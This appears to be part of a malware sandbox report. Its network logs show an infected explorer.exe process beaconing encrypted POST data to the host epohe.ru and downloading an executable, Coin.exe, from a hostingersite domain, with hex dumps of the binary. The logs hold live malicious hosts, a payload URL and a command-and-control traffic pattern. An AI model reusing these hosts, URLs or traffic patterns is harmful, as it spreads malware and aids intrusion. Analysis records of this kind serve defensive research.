Sep 2, 2024 11:44:52.186712980 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mdaxajnxssfl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: epohe.ru
Sep 2, 2024 11:44:52.186736107 CEST	157	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 19 b6 e6 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu_Nb}OtRROrjHm[GCYN0hZNQQ%
Sep 2, 2024 11:44:53.088325977 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49779	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:02.573009014 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://epvctlndxvceigyl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: epohe.ru
Sep 2, 2024 11:45:02.573051929 CEST	243	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 46 ab 9d Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuPF&gmMd3KJc<c,T#K-LTfZ[1$CHX8!'wEJ8Zf-VBV2qX!YC
Sep 2, 2024 11:45:03.508183002 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49780	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:08.353020906 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbdxgcigtdnc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: epohe.ru
Sep 2, 2024 11:45:08.353049040 CEST	350	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 28 f9 f7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu`(GEfkIlfi(ns,!mb!ZSG3*O@K:?dxJ/A5C"H%k%j7{X\)X_kz=@,e
Sep 2, 2024 11:45:09.260143042 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49781	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:13.552021980 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qhwbbbidikeuoya.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: epohe.ru
Sep 2, 2024 11:45:13.552045107 CEST	166	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 22 ca 9c Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vue"b#xm\|_o.<k0+YOYC=\IY*M\|F)R(
Sep 2, 2024 11:45:14.632817030 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49782	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:19.332861900 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktmmebudltbr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: epohe.ru
Sep 2, 2024 11:45:19.332880974 CEST	188	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 37 eb fa Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuT7jTR;"z"q~8DP,iJtL::XnQ&<C7Z85)F#7C_-'
Sep 2, 2024 11:45:20.269524097 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49783	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:24.196890116 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://psyhdeolvmp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: epohe.ru
Sep 2, 2024 11:45:24.196913958 CEST	312	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 0b ad f4 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu`D{fjW0;<@oSr IIP0Gm+^mkH\UJ;7#,5->*CisUtRq,/
Sep 2, 2024 11:45:25.102648020 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49784	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:29.521807909 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ckgifyjrwgvlwluh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: epohe.ru
Sep 2, 2024 11:45:29.521850109 CEST	114	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 58 b5 b5 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuCXnBZbxs"'
Sep 2, 2024 11:45:30.434545040 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49785	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:34.635025024 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtcwkmlaiuwf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: epohe.ru
Sep 2, 2024 11:45:34.635061979 CEST	334	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 28 c7 be Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu+(YSOP8dwPE>b)~L])JgPUl=9[?Op1lfK.;W!mkt=+eU%9AJt
Sep 2, 2024 11:45:35.566848040 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49786	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:39.700259924 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://asfcixluuutwn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: epohe.ru
Sep 2, 2024 11:45:39.700280905 CEST	272	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 40 ce 93 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuu@KojbI5Fk2aV-#52E#*7EKx1G6![ 4<qa;A<?ExxDAjb"K_3
Sep 2, 2024 11:45:40.635361910 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49787	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:45.315229893 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jlbunmblotwunq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 360 Host: epohe.ru
Sep 2, 2024 11:45:45.315428019 CEST	360	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 5f a8 8e Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vun_uTyV79Vt/k]~o@HVM"_+9'$vD,o0+_w+L\|72WiEf(]kfY&
Sep 2, 2024 11:45:46.244891882 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49788	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:50.538408995 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vfaiilfonqsqudx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: epohe.ru
Sep 2, 2024 11:45:50.538423061 CEST	118	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 14 fd 9a Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu"HWqt7gJ/%3$,[
Sep 2, 2024 11:45:51.472450018 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49789	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:45:56.311129093 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qjqwiddoadvtn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: epohe.ru
Sep 2, 2024 11:45:56.311152935 CEST	260	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 32 c9 ab Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuy2[Rv8d+kbXiZ.3?-PF{%m?x.K<Cp'aT!9?O(zLUvv E/8
Sep 2, 2024 11:45:57.212954998 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:45:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49763	191.96.144.157	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 09:42:52 UTC	192	OUT	GET /Coin.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: www.darkviolet-alpaca-923878.hostingersite.com
2024-09-02 09:42:52 UTC	533	IN	HTTP/1.1 200 OK Server: hcdn Date: Mon, 02 Sep 2024 09:42:52 GMT Content-Type: application/x-executable Content-Length: 3639176 Connection: close last-modified: Sun, 01 Sep 2024 09:33:03 GMT etag: "378788-66d434cf-b3fea62b77a48d21;;;" platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests x-turbo-charged-by: LiteSpeed alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 6e9f1bd55434189bbb983139904ac3c1-bos-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.011 Accept-Ranges: bytes
2024-09-02 09:42:52 UTC	836	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 00 d0 37 00 00 00 00 00 00 66 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49 Data Ascii: 7f7@P@Boolean@FalseTrue@,@Char@@I
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: e8 56 ff ff ff 84 c0 75 04 33 c0 89 06 5a 5d 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b d8 8b fb 8b 32 8b 43 08 3b f0 72 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c 24 04 2b f0 89 73 0c 8b d4 8b c3 e8 d0 fe ff ff 84 c0 75 04 33 c0 eb 0c b0 01 eb 08 8b 1b 3b fb 75 81 33 c0 59 5a 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 ec 85 45 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00 6a 00 8b 03 50 e8 d9 Data Ascii: Vu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u){*J${{+\|$+su3;u3YZ]_^[SVW}sjh Vj;t#EluhjP
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 26 fc ff ff 8b 44 24 0c 89 44 24 04 8b 44 24 10 89 44 24 08 83 7c 24 04 00 74 14 8d 54 24 04 b8 fc 85 45 00 e8 91 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 e2 1a 40 00 64 ff 32 64 89 22 68 cc 85 45 00 e8 39 f9 ff ff 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 2e f9 ff ff b8 ec 85 45 00 e8 8c f9 ff ff b8 fc 85 45 00 e8 82 f9 ff ff b8 28 86 45 00 e8 78 f9 ff ff 68 f8 0f 00 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 af f8 ff ff c3 e9 71 1d 00 00 eb e5 a0 c4 85 45 00 5d c3 55 8b ec 53 80 Data Ascii: &D$D$D$D$\|$tT$E3_^[U3Uh@d2d"hE9=MEthE.EE(Exhj$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 04 e8 44 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 57 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5b c3 90 53 56 83 c4 f8 8b f2 8b d8 8b cc 8d 56 04 8b c3 e8 a3 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 26 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5e 5b c3 8d 40 00 33 d2 85 c0 79 03 83 c0 03 c1 f8 02 3d 00 04 00 00 7f 16 8b 15 24 86 45 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 53 56 57 55 8b f0 bf 18 86 45 00 bd 1c 86 45 00 8b 1d 10 86 45 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 73 Data Ascii: Gt$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;sC;~{s
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 05 1c 86 45 00 83 3d 1c 86 45 00 0c 0f 8d 4c 01 00 00 8b 04 24 01 05 20 86 45 00 8b 04 24 29 05 1c 86 45 00 8b f7 e9 33 01 00 00 8b d8 f6 03 02 75 0d 8b c3 8b 50 08 01 14 24 e8 e9 f6 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 91 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 20 86 45 00 75 67 a1 1c 86 45 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 1c 86 45 00 8b 44 24 04 01 05 20 86 45 00 83 3d 1c 86 45 00 0c 7d 18 a1 1c 86 45 00 01 05 20 86 45 00 03 35 1c 86 45 00 33 c0 a3 1c 86 45 00 8b c6 2b c7 01 05 b8 85 45 00 8b 45 00 25 03 00 00 80 0b f0 89 75 00 b0 01 e9 a2 00 00 00 e8 3e f9 ff ff 8b dd 03 df f6 03 02 75 4d 8b d3 8b c2 8b 48 08 89 0c 24 8b 0c 24 3b 4c 24 04 7d 0e 03 14 24 8b da 8b 04 24 29 Data Ascii: E=EL$ E$)E3uP$<$\|$+D$; EugE;D$\|SD$)ED$ E=E}E E5E3E+EE%u>uMH$$;L$}$$)
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 6f fe ff ff eb 12 81 fb 50 80 45 00 74 0a b8 67 00 00 00 e8 5b fe ff ff 8b c6 5e 5b c3 8b c0 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 af fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a Data Ascii: oPEtg[^[S:vB@[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0Nt
2024-09-02 09:42:52 UTC	1369	IN	Data Raw: 8b c0 53 33 db 6a 00 e8 ee ff ff ff 83 f8 07 75 1c 6a 01 e8 e2 ff ff ff 25 00 ff 00 00 3d 00 0d 00 00 74 07 3d 00 04 00 00 75 02 b3 01 8b c3 5b c3 90 55 8b ec 83 c4 f4 0f b7 05 20 60 45 00 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 24 30 40 00 68 02 00 00 80 e8 31 e3 ff ff 85 c0 75 4d 33 c0 55 68 fd 2f 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 40 30 40 00 8b 45 fc 50 e8 06 e3 ff ff 33 c0 5a 59 59 64 89 10 68 04 30 40 00 8b 45 fc 50 e8 e0 e2 ff ff c3 e9 56 08 00 00 eb ef 66 a1 20 60 45 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 60 45 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 00 00 00 00 db e3 9b d9 2d 20 60 45 00 Data Ascii: S3juj%=t=u[U `EEEPjjh$0@h1uM3Uh/@d0d EEPEPjjh@0@EP3ZYYdh0@EPVf `Ef%fUf?ff `E]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- `E
